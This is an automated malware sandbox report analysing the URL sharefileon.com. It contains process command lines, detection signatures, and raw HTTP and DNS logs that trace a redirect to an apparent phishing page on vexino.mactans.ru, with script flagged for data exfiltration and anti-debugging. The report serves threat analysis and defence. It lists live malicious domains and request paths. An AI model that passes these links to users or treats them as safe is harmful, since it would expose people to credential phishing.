Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://sharefileon.com

Overview

General Information

Sample URL:http://sharefileon.com
Analysis ID:1576927
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 7068 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 676 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1984,i,5179110218857674790,7664431697480390982,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 1684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://sharefileon.com" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: https://sharefileon.com/Joe Sandbox AI: Page contains button: 'View Document' Source: '1.0.pages.csv'
Source: 0.29.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://vexino.mactans.ru/21EzuOJ/... This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common keyboard shortcuts, and attempting to redirect the user to a different website. The use of `debugger` statements and the interval-based redirection mechanism suggest malicious intent to interfere with the user's browsing experience and potentially compromise their security.
Source: 0.30.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://vexino.mactans.ru/21EzuOJ/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to the 'teams.microsoft.com' domain, which is likely a phishing attempt. The overall behavior of this script is highly suspicious and indicates a high risk of malicious intent.
Source: 0.28.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://vexino.mactans.ru/21EzuOJ/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and indicative of malicious intent.
Source: https://vexino.mactans.ru/21EzuOJ/HTTP Parser: No favicon
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.1
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.141.63
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.1
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.1
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: sharefileon.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: dps_site_id=us-east-1
Source: global trafficHTTP traffic detected: GET /markup/ad HTTP/1.1Host: sharefileon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://sharefileon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: dps_site_id=us-east-1
Source: global trafficHTTP traffic detected: GET /sw.js HTTP/1.1Host: sharefileon.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://sharefileon.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: dps_site_id=us-east-1; cookie_warning_dismissed=true; cookie_terms_accepted=true
Source: global trafficHTTP traffic detected: GET /manifest.webmanifest HTTP/1.1Host: sharefileon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://sharefileon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /21EzuOJ/ HTTP/1.1Host: vexino.mactans.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://sharefileon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: sharefileon.comConnection: keep-alivePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://sharefileon.com/sw.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: dps_site_id=us-east-1; cookie_warning_dismissed=true; cookie_terms_accepted=true
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vexino.mactans.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vexino.mactans.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vexino.mactans.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vexino.mactans.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/icqy5/0x4AAAAAAA2OnbUL2-DXkbe_/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://vexino.mactans.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f38965da8164322&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/icqy5/0x4AAAAAAA2OnbUL2-DXkbe_/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/icqy5/0x4AAAAAAA2OnbUL2-DXkbe_/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: vexino.mactans.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vexino.mactans.ru/21EzuOJ/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImFlK2l1UXhEd2dqWStTdGs4Z1IxclE9PSIsInZhbHVlIjoiSFZOamFVbTRMZVV6bTBSUG00Qi9lV1FWZkFGN00yc3ExaHRxd2xvbWJiU3NUWDh6aXl0Skc5WURnK2owWnYwcmkyaWJnZmd3VkdEN0pmdktKbms1UEJrSWVoR2orVWgyYTVFM0RaT2VXd3FtNU5GZ1BodVZSNFd0d2NjM01QTk8iLCJtYWMiOiI5N2U5YmQ4NWFjZDA1NTdmMzM3ZjFhYmFmNGQ4MzkxNDZiZDhjZmQwNDE1YmRmNTRjZDFjNmMyMTIzM2U3OTE0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlOYm0yeHV3L0l4UFA1Q2dWUUxnU1E9PSIsInZhbHVlIjoibkpYSmVIQmY2SVVhcXpuMU5QemZEOGp2YUVZWHlBM0daZ0tvRUh4cDRlQitsMjhEYWYwaW1USnc1cUZWTDRwU3Ywc3VoaEJvSlZtTGpla1VpWm1xZGpZV0tobXB6WEI0QlhzY3JMOEhoZ0E0MUJiZHFWRlFqcS85UnhodXF1UDciLCJtYWMiOiI0MzdhYTk2YjQyZWZkZjAwOTU1Y2Y1NTk0ZThjMjk1YjMwZTBiNDM3NjA3YzYxMzg2OTM3Njg2OTM3YjUzYmVlIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f38965da8164322&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/23085707:1734452156:WblsTdAJEcjJkQ6MdfC5aVXpjbsW6KLUWCunspYRaNE/8f38965da8164322/UMT0HZxCYLKOn6xxD1kYBQ6BtLlFKddTwtjvgoUpoyY-1734456063-1.1.1.1-JZJ6q_Y40HD2E7Y6Xr.GxTkNZKxni2VN_gZ9lI79T8H_8oHo1ckqnNOVOYfvaV9j HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8f38965da8164322/1734456067754/419efe1e59f95ef2d623cf66173f5d1618a76a3e3584ba92125c2cd6aca37a03/Rmq4r5O10Pi1hY1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/icqy5/0x4AAAAAAA2OnbUL2-DXkbe_/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f38965da8164322/1734456067754/uaxTCBfY0EP6nEY HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/icqy5/0x4AAAAAAA2OnbUL2-DXkbe_/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f38965da8164322/1734456067754/uaxTCBfY0EP6nEY HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/23085707:1734452156:WblsTdAJEcjJkQ6MdfC5aVXpjbsW6KLUWCunspYRaNE/8f38965da8164322/UMT0HZxCYLKOn6xxD1kYBQ6BtLlFKddTwtjvgoUpoyY-1734456063-1.1.1.1-JZJ6q_Y40HD2E7Y6Xr.GxTkNZKxni2VN_gZ9lI79T8H_8oHo1ckqnNOVOYfvaV9j HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/23085707:1734452156:WblsTdAJEcjJkQ6MdfC5aVXpjbsW6KLUWCunspYRaNE/8f38965da8164322/UMT0HZxCYLKOn6xxD1kYBQ6BtLlFKddTwtjvgoUpoyY-1734456063-1.1.1.1-JZJ6q_Y40HD2E7Y6Xr.GxTkNZKxni2VN_gZ9lI79T8H_8oHo1ckqnNOVOYfvaV9j HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /qHLFRJZPdOTGGnAgLpZPzySPmqdHWHETPVTWEAMVQJLRSPMAYJAEZKMUSKUMPCY HTTP/1.1Host: weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://vexino.mactans.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://vexino.mactans.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /qHLFRJZPdOTGGnAgLpZPzySPmqdHWHETPVTWEAMVQJLRSPMAYJAEZKMUSKUMPCY HTTP/1.1Host: weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: sharefileon.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: sharefileon.com
Source: global trafficDNS traffic detected: DNS query: img1.wsimg.com
Source: global trafficDNS traffic detected: DNS query: isteam.wsimg.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: vexino.mactans.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ru
Source: global trafficDNS traffic detected: DNS query: teams.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/23085707:1734452156:WblsTdAJEcjJkQ6MdfC5aVXpjbsW6KLUWCunspYRaNE/8f38965da8164322/UMT0HZxCYLKOn6xxD1kYBQ6BtLlFKddTwtjvgoUpoyY-1734456063-1.1.1.1-JZJ6q_Y40HD2E7Y6Xr.GxTkNZKxni2VN_gZ9lI79T8H_8oHo1ckqnNOVOYfvaV9j HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3225sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: UMT0HZxCYLKOn6xxD1kYBQ6BtLlFKddTwtjvgoUpoyY-1734456063-1.1.1.1-JZJ6q_Y40HD2E7Y6Xr.GxTkNZKxni2VN_gZ9lI79T8H_8oHo1ckqnNOVOYfvaV9jsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/icqy5/0x4AAAAAAA2OnbUL2-DXkbe_/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
